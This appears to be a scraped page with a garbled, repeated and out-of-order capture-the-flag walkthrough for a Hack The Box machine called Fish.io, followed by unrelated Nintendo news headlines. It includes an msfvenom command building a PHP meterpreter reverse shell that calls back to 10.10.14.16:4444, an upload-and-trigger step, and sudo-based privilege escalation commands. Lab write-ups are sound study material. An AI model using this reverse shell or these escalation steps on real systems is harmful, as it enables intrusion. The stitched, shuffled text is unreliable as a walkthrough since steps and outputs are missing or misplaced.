Fish.io | Hack

sudo -l We can leverage this configuration to gain root access:

su root

sudo -u fish /bin/bash Switching to the fish user, we find that the user's home directory contains a config file with sensitive information:

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.16 LPORT=4444 -f raw > shell.php Uploading the shell to the server via the "Upload File" feature, we can then trigger the execution of the shell by accessing the uploaded file:

This hint suggests that the website might be running in a non-production environment. We can try to access the /admin directory, which often contains administrative interfaces:

You're interested in writing about Hack The Box's Fish.io, I presume?

With administrative access, we can now explore the application's functionality. Upon reviewing the dashboard, we notice a " Upload File" feature. This feature can potentially be used to execute arbitrary code on the server.

To begin, we need to gather information about the target machine. Using the nmap command, we can perform an initial scan to identify open ports and services:

Fish.io | Hack

sudo -l We can leverage this configuration to gain root access:

su root

sudo -u fish /bin/bash Switching to the fish user, we find that the user's home directory contains a config file with sensitive information: hack fish.io

You're interested in writing about Hack The Box's Fish.io, I presume?

To begin, we need to gather information about the target machine. Using the nmap command, we can perform an initial scan to identify open ports and services:

Fish.io | Hack

The Legend of Zelda: Breath of the Wild 2 Collector’s Edition may have just leaked

Nintendo announces new Indie World showcase for August 18th

Amazon listing suggests Zelda: Skyward Sword is coming to Nintendo Switch

Shin Megami Tensei V and Shin Megami Tensei III Nocturne HD Remaster are releasing 2021

Nintendo Direct Mini: Partner Showcase announced for July 20th 2020